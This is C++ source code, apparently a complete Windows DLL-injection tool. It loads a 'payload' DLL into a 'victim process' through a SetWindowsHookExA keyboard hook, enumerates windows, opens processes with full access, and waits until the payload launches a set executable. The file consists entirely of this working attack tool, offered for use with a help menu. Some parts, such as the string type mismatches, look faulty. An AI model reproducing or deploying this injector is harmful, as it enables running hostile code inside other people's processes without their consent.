#include <windows.h>#include <stdio.h>#include <tlhelp32.h>#include <stdli

1. #include <windows.h>
2. #include <stdio.h>
3. #include <tlhelp32.h>
4. #include <stdlib.h>
5. #include <string>
6. #include <iostream>
7. #include <psapi.h>
8.  
9. using namespace std;
10.  
11. BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
12. {
13.     // function that prints Windows and their handles
14.     DWORD dwThreadId, dwProcessId;
15.     HINSTANCE hInstance;
16.     char title[255];
17.     WCHAR modulefilename[255];
18.     HANDLE hProcess;
19.  
20.     if (!hWnd)
21.         return TRUE;        // Not a window
22.     if (!::IsWindowVisible(hWnd))
23.         return TRUE;        // Not visible
24.     if (!SendMessage(hWnd, WM_GETTEXT, sizeof(title), (LPARAM)title))
25.         return TRUE;        // No window title
26.  
27.     hInstance = (HINSTANCE)GetWindowLong(hWnd, -6);
28.     dwThreadId = GetWindowThreadProcessId(hWnd, &dwProcessId);
29.     hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
30.  
31.     // GetModuleFileNameEx uses psapi, which works for NT only!
32.     if (GetModuleFileNameEx(hProcess, hInstance, modulefilename, sizeof(modulefilename)))
33.         printf("Window Handle: %p, Title: %s, ModuleFilename: %s, GetWindowThreadProcessId: %d\n", hWnd, title, modulefilename, dwThreadId);
34.     else
35.         printf("Handle: %p, Title: %s, ModuleFilename: empty\n", hWnd, title);
36.     CloseHandle(hProcess);
37.  
38.     return TRUE;
39. }
40.  
41. BOOL process_check()
42. {
43.     HANDLE hProcessSnap;
44.     PROCESSENTRY32 pe32;
45.  
46.     // take a snapshot of all processes in the system
47.     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
48.     if (hProcessSnap == INVALID_HANDLE_VALUE)
49.     {
50.         printf("[-] CreateToolhelp32Snaphost has failed!");
51.         return FALSE;
52.     }
53.  
54.     pe32.dwSize = sizeof(PROCESSENTRY32);
55.  
56.     if (!Process32First(hProcessSnap, &pe32))
57.     {
58.         printf("[-] Process32First has failed!");
59.         CloseHandle(hProcessSnap);
60.         return FALSE;
61.     }
62.  
63.     do
64.     {
65.         if (strcmp(pe32.szExeFile, "SumatraPortable3.2.exe") == 0)
66.         {
67.             return FALSE;
68.         }
69.     } while (Process32Next(hProcessSnap, &pe32));
70.  
71.     CloseHandle(hProcessSnap);
72.  
73.     return TRUE;
74. }
75.  
76. BOOL InjectDLL(HWND hWindow, LPCWSTR lpFileName)
77. {
78.     // load the DLL in the injector without calling the DllMain
79.     HMODULE hModule = LoadLibraryEx(lpFileName, NULL, DONT_RESOLVE_DLL_REFERENCES);
80.     if (hModule == NULL)
81.     {
82.         printf("[-] LoadLibraryExA has failed: %d\n", GetLastError());
83.         return 1;
84.     }
85.  
86.     // get the exported fucntion from the payload DLL
87.     HOOKPROC pExportFunction = (HOOKPROC)GetProcAddress(hModule, MAKEINTRESOURCE(1));
88.     if (pExportFunction == NULL)
89.     {
90.         printf("[-] GetProcAddress has failed: %d\n", GetLastError());
91.         return 1;
92.     }
93.  
94.     DWORD pid = 0;
95.     DWORD dwThreadId = GetWindowThreadProcessId(hWindow, &pid);
96.     HHOOK hHooked = SetWindowsHookExA(WH_KEYBOARD, pExportFunction, hModule, dwThreadId);
97.     if (hHooked == NULL)
98.     {
99.         printf("[-] SetWindowsHookExA has failed: %d\n", GetLastError());
100.         return 1;
101.     }
102.  
103.     if (!PostMessage(hWindow, WM_NULL, NULL, NULL))
104.     {
105.         printf("[-] PostThreadMessage has failed: %d\n", GetLastError());
106.         return 1;
107.     }
108.  
109.     BOOL status = FALSE;
110.     do
111.     {
112.         // do until the payload creates the specified process
113.         status = process_check();
114.     } while (status);
115.  
116.     if (!UnhookWindowsHookEx(hHooked))
117.     {
118.         printf("[-] UnhookWindowsHookEx has failed: %d\n", GetLastError());
119.         return 1;
120.     }
121.  
122.     return 0;
123. }
124.  
125. void menu()
126. {
127.     printf("SYNOPSIS\n");
128.     printf("\tdll_injection.exe -p process_name -d dll_name\n\n");
129.     printf("DESCRIPTION\n");
130.     printf("\tApplication to inject a DLL into a given process using SetWindowsHookExA\n\n");
131.     printf("OPTIONS\n");
132.     printf("\t-h, --help\n");
133.     printf("\t\tdisplay this help and exit\n");
134.     printf("\t-lw, --list-windows\n");
135.     printf("\t\tdisplay the active Windows with their Handles\n");
136.     printf("\t-p, --process-name\n");
137.     printf("\t\tSpecify the target/victim process\n");
138.     printf("\t-d, --dll-path\n");
139.     printf("\t\tSpecify the DLL that will be injected into the victim process\n");
140.     printf("\t-wh, --window-handle\n");
141.     printf("\t\tSpecify the handle of the Window into which we want to inject\n");
142. }
143.  
144. int main(int argc, char** argv)
145. {
146.     BOOL lset = FALSE, pset = FALSE, dset = FALSE, whset = FALSE;
147.     BOOL ProcessTokenAcquired = FALSE;
148.     std::string PName, DLLPath;
149.     HWND hWindow = NULL;
150.  
151.     printf("[+] Program started...\n");
152.  
153.     for (int i = 1; i < argc; i++)
154.     {
155.         std::string s = argv[i];
156.         // display help menu and exit
157.         if (!s.compare("-h") || !s.compare("--help")) menu();
158.         // print active Windows and Handles
159.         if (!s.compare("-lw") || !s.compare("--list-windows"))
160.         {
161.             lset = TRUE;
162.             printf("[+] List of active Windows:\n");
163.             EnumWindows(EnumWindowsProc, NULL);
164.             return 0;
165.         }
166.         /// check if the process name has been specified
167.         if (!s.compare("-p") || !s.compare("--process-name"))
168.         {
169.             // debug
170.             //printf("[+] input process-name: %s\n", argv[i+1]);
171.             PName = argv[i + 1];
172.             pset = TRUE;
173.         }
174.         // check if the DLL path has been specified
175.         if (!s.compare("-d") || !s.compare("--dll-path"))
176.         {
177.             // debug
178.             //printf("[+] input DLL-path: %s\n", argv[i+1]);
179.             DLLPath = argv[i + 1];
180.             dset = TRUE;
181.         }
182.         if (!s.compare("-wh") || !s.compare("--window-handle"))
183.         {
184.             hWindow = (HWND)strtol(argv[i + 1], NULL, 16);
185.             whset = TRUE;
186.         }
187.     }
188.     if (!((!(pset && dset && whset) && (lset)) || ((pset && dset && whset) && !(lset))))
189.     {
190.         printf("[-] You haven't specified a process name, a DLL path and a Window handle.\n");
191.         printf("[-] You need to specify either the list option(-lw) or process name, dll name and the windows handle flags (-p, -d, -wh)\n");
192.         printf("[-] Exiting...\n");
193.         return 1;
194.     }
195.  
196.     printf("[+] Application will run until the payload gets executed\n");
197.     // call inject DLL
198.     if (!InjectDLL(hWindow, DLLPath.c_str()))
199.         printf("[+] Successful injection occurred!\n");
200.     else
201.         printf("[-] Inject has failed\n");
202.  
203.     return 0;
204. }